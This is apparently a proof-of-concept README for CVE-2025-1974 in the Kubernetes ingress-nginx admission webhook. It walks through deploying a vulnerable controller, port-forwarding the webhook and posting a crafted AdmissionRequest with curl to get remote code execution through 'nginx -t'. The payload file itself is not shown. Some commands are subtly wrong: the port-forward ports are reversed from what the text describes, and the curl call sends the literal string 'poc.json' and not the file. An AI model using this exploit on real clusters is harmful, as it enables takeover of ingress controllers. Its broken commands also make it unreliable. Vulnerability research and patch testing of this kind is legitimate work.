# CVE-2025-1974 POC
This was all done on a local minikube environment.

## Create the vulnerable pod

```shell
kubectl apply -f nginx-ingress-controller.yaml
```

## Observe webhook server

```shell
kubectl describe <pod name> -n <namespace>
```

```
Name:             ingress-nginx-controller-6579f7cfb4-vzfjh
Namespace:        ingress-nginx
Priority:         0
Service Account:  ingress-nginx
Node:             minikube/192.168.49.2
Start Time:       Mon, 24 Mar 2025 18:20:31 -0500
Labels:           app.kubernetes.io/component=controller
                  app.kubernetes.io/instance=ingress-nginx
                  app.kubernetes.io/name=ingress-nginx
                  pod-template-hash=6579f7cfb4
Annotations:      <none>
Status:           Running
IP:               10.244.0.6
IPs:
  IP:           10.244.0.6
Controlled By:  ReplicaSet/ingress-nginx-controller-6579f7cfb4
Containers:
  controller:
    Container ID:  docker://0271a7ebeb16b1131e5c653279ebf0b6543e9e137ac544bdecf8e88e726fce10
    Image:         registry.k8s.io/ingress-nginx/controller:v1.11.3@sha256:d56f135b6462cfc476447cfe564b83a45e8bb7da2774963b00d12161112270b7
    Image ID:      docker-pullable://registry.k8s.io/ingress-nginx/controller@sha256:d56f135b6462cfc476447cfe564b83a45e8bb7da2774963b00d12161112270b7
    Ports:         80/TCP, 443/TCP, 8443/TCP
    Host Ports:    0/TCP, 0/TCP, 0/TCP
    Args:
      /nginx-ingress-controller
      --publish-service=$(POD_NAMESPACE)/ingress-nginx-controller
      --election-id=ingress-controller-leader
      --controller-class=k8s.io/ingress-nginx
      --ingress-class=nginx
      --configmap=$(POD_NAMESPACE)/ingress-nginx-controller
      --default-ssl-certificate=ingress-nginx/ingress-certs
      --validating-webhook=:8443
      --validating-webhook-certificate=/usr/local/certificates/cert
      --validating-webhook-key=/usr/local/certificates/key
    State:          Running
      Started:      Mon, 24 Mar 2025 18:20:42 -0500
    Ready:          True
    Restart Count:  0
    Requests:
      cpu:      100m
      memory:   90Mi
    Liveness:   http-get http://:10254/healthz delay=10s timeout=1s period=10s #success=1 #failure=5
    Readiness:  http-get http://:10254/healthz delay=10s timeout=1s period=10s #success=1 #failure=3
    Environment:
      POD_NAME:       ingress-nginx-controller-6579f7cfb4-vzfjh (v1:metadata.name)
      POD_NAMESPACE:  ingress-nginx (v1:metadata.namespace)
      LD_PRELOAD:     /usr/local/lib/libmimalloc.so
    Mounts:
      /usr/local/certificates/ from webhook-cert (ro)
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-gs9xj (ro)
Conditions:
  Type                        Status
  PodReadyToStartContainers   True 
  Initialized                 True 
  Ready                       True 
  ContainersReady             True 
  PodScheduled                True 
Volumes:
  webhook-cert:
    Type:        Secret (a volume populated by a Secret)
    SecretName:  ingress-nginx-admission
    Optional:    false
  kube-api-access-gs9xj:
    Type:                    Projected (a volume that contains injected data from multiple sources)
    TokenExpirationSeconds:  3607
    ConfigMapName:           kube-root-ca.crt
    ConfigMapOptional:       <nil>
    DownwardAPI:             true
QoS Class:                   Burstable
Node-Selectors:              kubernetes.io/os=linux
Tolerations:                 node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                             node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:
  Type     Reason       Age                    From                      Message
  ----     ------       ----                   ----                      -------
  Normal   Scheduled    8m53s                  default-scheduler         Successfully assigned ingress-nginx/ingress-nginx-controller-6579f7cfb4-vzfjh to minikube
  Warning  FailedMount  8m52s (x3 over 8m53s)  kubelet                   MountVolume.SetUp failed for volume "webhook-cert" : secret "ingress-nginx-admission" not found
  Normal   Pulling      8m49s                  kubelet                   Pulling image "registry.k8s.io/ingress-nginx/controller:v1.11.3@sha256:d56f135b6462cfc476447cfe564b83a45e8bb7da2774963b00d12161112270b7"
  Normal   Pulled       8m42s                  kubelet                   Successfully pulled image "registry.k8s.io/ingress-nginx/controller:v1.11.3@sha256:d56f135b6462cfc476447cfe564b83a45e8bb7da2774963b00d12161112270b7" in 7.493s (7.493s including waiting). Image size: 292645598 bytes.
  Normal   Created      8m42s                  kubelet                   Created container controller
  Normal   Started      8m42s                  kubelet                   Started container controller
  Normal   RELOAD       8m40s                  nginx-ingress-controller  NGINX reload triggered due to a change in configuration

```

Notice that the validating webhook is listening on port 8443:

```
--validating-webhook=:8443
```

## Hack the Webhook Server

Access the webhook port with a port forward:

```shell
kubectl port-forward -n ingress-nginx ingress-nginx-controller-6579f7cfb4-vzfjh 8443:1337
```

In this case, I've port forwarded the vulnerable webhook server from the pod to my local machine on local port 1337.


Interact with the admission web server, sending an AdmissionRequest containing an nginx configuration. This results in RCE.

```
curl --insecure -v -H "Content-Type: application/json" --data poc.json https://localhost:1337/fake/path
```

Observe logs for successful execution.

```shell
kubectl logs ingress-nginx-controller-6579f7cfb4-vzfjh -n ingress-nginx
```

```
I0325 00:53:33.471803       7 main.go:107] "successfully validated configuration, accepting" ingress="/"
W0325 01:12:58.614819       7 controller.go:1110] Error obtaining Endpoints for Service "default/demo": no object matching key "default/demo" in local store
W0325 01:12:58.614838       7 controller.go:1110] Error obtaining Endpoints for Service "/kubernetes": no object matching key "/kubernetes" in local store
W0325 01:12:58.614847       7 controller.go:1235] Error loading custom default certificate, falling back to generated default:
local SSL certificate ingress-nginx/ingress-certs was not found
W0325 01:12:58.614874       7 controller.go:1235] Error loading custom default certificate, falling back to generated default:
local SSL certificate ingress-nginx/ingress-certs was not found
W0325 01:12:58.614881       7 controller.go:1235] Error loading custom default certificate, falling back to generated default:
local SSL certificate ingress-nginx/ingress-certs was not found
I0325 01:12:58.628195       7 admission.go:149] processed ingress via admission controller {testedIngressLength:2 testedIngressTime:0.014s renderingIngressLength:2 renderingIngressTime:0s admissionTime:0.014s testedConfigurationSize:22.1kB}
I0325 01:12:58.628207       7 main.go:107] "successfully validated configuration, accepting" ingress="/"
```


## Impact

CheckIngress gets called with our supplied Ingress. CheckIngress will execute

```
nginx -t <tmp file containing our Ingress cfg>
```


We can also inject annotations via the AdmissionReview request.
